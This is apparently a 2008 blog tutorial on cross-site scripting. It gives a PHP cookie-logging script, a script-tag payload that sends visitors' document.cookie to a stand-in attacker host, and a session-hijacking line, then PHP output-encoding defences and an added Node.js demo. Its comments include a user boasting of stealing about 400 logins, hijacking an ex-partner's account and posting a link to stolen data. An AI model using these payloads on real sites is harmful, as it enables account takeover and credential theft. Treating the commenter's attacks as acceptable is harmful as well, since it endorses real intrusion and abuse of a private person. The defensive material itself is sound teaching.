Cross Site Scripting (XSS)
Posted by: Jordan in XSS, Security, Programming, PHP, JavaScript
XSS, or Cross Site Scripting, is one of the most common attacks against web applications, and a surprisingly easy one to carry out against a site that does not encode what its users type. Put simply, XSS is injecting a piece of JavaScript into a user input field (a comment, a profile, a forum post) that the target site then echoes back into its pages unencoded, so the browser of every visitor runs it. The injected script usually sends the visitor's cookies (including the session ID) to a logging script on a server the attacker controls.

Once the hacker has that session ID, they can present it to the site and be treated as the victim, taking over the account without ever knowing the password. This is a short guide and tutorial on XSS, written to show webmasters how these attacks happen and how to prevent these types of attacks.

Step 1
The hacker hosts a script that receives the stolen information and saves it somewhere (usually a file) for retrieval at a later date.

A Sample PHP Log Script:

<?php
// Attacker's logging script (sessionlog.php): appends whatever arrives in the
// "info" query parameter to a text file, one entry per line, then answers politely
// so the redirected victim sees nothing alarming.
$information = $_GET['info'];
$file = fopen("infolog.txt", "a");
fwrite($file, $information . "\n");
fclose($file);
print "Thanks!";
?>

Let's call this script sessionlog.php and pretend the hacker placed it at this URL: http://www.mydomain.com/sessionlog.php


Step 2
Next the hacker finds a target site. The target site must have user input fields whose contents are shown back to other users without being encoded, so that a <script> tag typed into them ends up in the page as a live tag rather than as text.

A Sample JavaScript Injection Code:

<script>window.location = "http://www.mydomain.com/sessionlog.php?info=" + document.cookie</script>

This code redirects anyone who views the injected content to the URL of your choice. In the example above it sends them to our pretend script, http://www.mydomain.com/sessionlog.php, with a query parameter named info that carries everything document.cookie exposes for the target site, which normally includes the session cookie.

Step 3 - Your Information
Now that the hacker has your information, he/she can extract the cookie name and value from the log file. They then return to your site and type the following into the browser's address bar.

javascript:void(document.cookie="variablename=info")

variablename is replaced with the cookie's name (for a PHP site this is typically PHPSESSID) and info with the value received from the log script. After a simple refresh of the page, the site reads the stolen session ID from the cookie and treats the hacker as that user, an admin for instance, with no login required.

Protection Methods - Preventing XSS
I'll note PHP functions here and describe them. For other web scripting languages you can probably find similar functions.

There are three PHP functions commonly used against XSS. None of them is magic: they only help when applied to user-supplied data at the point where it is written into an HTML page.

1. strip_tags() - This function deletes all HTML tags except the ones you list in its optional second argument. Be aware that it keeps the attributes of the allowed tags, so an allowed <a> can still carry an onclick handler; on its own it is a formatting helper, not an XSS defence.

$html_text = strip_tags($html_text);              // remove every tag
$html_text = strip_tags($html_text, '<b><i>');    // keep only <b> and <i>

2. htmlspecialchars() - This function converts the characters that have special meaning in HTML into entities: & becomes &amp;, < becomes &lt;, > becomes &gt;, " becomes &quot; and, with the ENT_QUOTES flag, ' becomes &#039;. A <script> tag passed through it is displayed as text instead of being executed.

$html_text = htmlspecialchars($html_text, ENT_QUOTES, 'UTF-8');

3. htmlentities() - This function works like the one above but converts every character that has an HTML entity equivalent, not just the five special ones. For XSS purposes the two are equivalent; htmlspecialchars() is usually preferred because it leaves accented and non-Latin text readable.

$html_text = htmlentities($html_text, ENT_QUOTES, 'UTF-8');


Use htmlspecialchars() or htmlentities() (with ENT_QUOTES) on every piece of user-supplied data at the moment it is echoed into an HTML page, not only when it is received, and treat strip_tags() as an optional extra rather than a defence. Encoding on output is what stops the injected tag from Step 2 from ever being parsed as a tag. Two caveats a webmaster should keep in mind: these functions cover data placed into HTML text and quoted attributes, so data inserted inside a <script> block or a URL needs a different encoding; and marking the session cookie HttpOnly keeps document.cookie from exposing it to injected script, which blunts this particular attack even when an encoding is missed somewhere.
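The three attack steps above and the output-encoding advice, put together as an added example that is not from the original post. It is written in JavaScript (Node.js) rather than PHP so that the rendering and the encoding can be exercised in one runnable file: escapeHtml() is a re-implementation of what htmlspecialchars($s, ENT_QUOTES, 'UTF-8') does, stripTags() a rough re-implementation of strip_tags() with an allowlist; both are assumptions written for this example, not PHP's own code. The comment payloads and the comment-page renderer are constructed for the example.

```javascript
// Added example (not from the original post). A tiny comment-page renderer in
// Node.js that takes the Step 2 payload through the vulnerable and the hardened
// code path, and shows why strip_tags() with an allowlist is not a defence.
// escapeHtml() and stripTags() are re-implementations written for this example
// (assumption: they mirror htmlspecialchars($s, ENT_QUOTES, 'UTF-8') and
// strip_tags($s, '<a><b>') closely enough for the point being made).

// Constructed sample input: the injection from Step 2, plus a variant that
// hides the same cookie theft in an event handler on an "allowed" tag.
const payloads = {
  scriptTag:
    '<script>window.location = "http://www.mydomain.com/sessionlog.php?info=" + document.cookie</script>',
  allowedTagWithHandler:
    '<a href="#" onclick="window.location=\'http://www.mydomain.com/sessionlog.php?info=\'+document.cookie">click me</a>',
};

// Output encoding for an HTML text node or quoted attribute. Every character
// that can open or close markup becomes an entity, so the browser shows the
// payload as text instead of executing it.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

// Tag stripping with an allowlist. Tags not in the list are deleted; allowed
// tags are kept verbatim, attributes and all, which is exactly the gap.
function stripTags(s, allowed = []) {
  const allow = new Set(allowed.map((t) => t.toLowerCase()));
  return String(s).replace(/<\/?([a-zA-Z][a-zA-Z0-9]*)\b[^>]*>/g, (tag, name) =>
    allow.has(name.toLowerCase()) ? tag : ''
  );
}

// Vulnerable rendering: untrusted input is concatenated straight into the page.
function renderVulnerable(comment) {
  return '<div class="comment">' + comment + '</div>';
}

// Hardened rendering: the input is encoded at the moment it enters HTML.
function renderSafe(comment) {
  return '<div class="comment">' + escapeHtml(comment) + '</div>';
}

// A deliberately crude check standing in for "would a browser run script here?":
// a real <script> tag, or an on*= event handler inside a real tag.
function containsActiveScript(html) {
  return /<script\b/i.test(html) || /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

// Runs each payload through the three code paths. Expected:
//   vulnerable: true, escaped: false, strippedScript: false,
//   strippedHandler: true (strip_tags let the onclick through), escapedHandler: false
function demo() {
  const allowed = ['a', 'b'];
  return {
    vulnerable: containsActiveScript(renderVulnerable(payloads.scriptTag)),
    escaped: containsActiveScript(renderSafe(payloads.scriptTag)),
    strippedScript: containsActiveScript(renderVulnerable(stripTags(payloads.scriptTag, allowed))),
    strippedHandler: containsActiveScript(renderVulnerable(stripTags(payloads.allowedTagWithHandler, allowed))),
    escapedHandler: containsActiveScript(renderSafe(payloads.allowedTagWithHandler)),
  };
}

console.log(demo());
```

Run it with node. The only path that is safe for both payloads is the one that encodes on output; stripping tags defeats the plain <script> injection but waves through the onclick variant because the tag it rides on is allowed.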

 

5 Comments
phpforfun
June 10, 2008
67.101.88.195

That's weird, I haxxored your site with XSS! lol..

And John showed me a GREAT tool, look up HTML Purifier.

Jordan
June 11, 2008
63.211.21.46

I thought about mentioning that but I didn't. You forgot to steal our cookie information or session data though.

phpforfun
June 11, 2008
68.110.101.33

The sessions were hashed, I didn't care too much to do it. I have done it though..

To clansitemanager.com and vampirefreaks.com

I actually still have the logs. On clansitemanager, I used XSS to inject a cookie stealer and forward them to the page they wanted. That account was a master of a website, so I put the same code on his site, then whoever visited his site, I put it on their site too. I got about 400 passwords and usernames, I'm banned for like 5 years.. lol

phpforfun
June 11, 2008
68.110.101.33

Oh, for Vampire Freaks, my ex was a goth wannabe, so I got on her account, and typed [removed]alert([removed]), and it said "userid=13123". I used XSS to get his hashed password, changed hers to his pass, and her user ID to 1, and I had full access to the website. The goth owner got PISSED, lol

phpforfun
June 14, 2008
67.101.88.248

http://analyzethathost.com/c2.html

Those are what I stole.
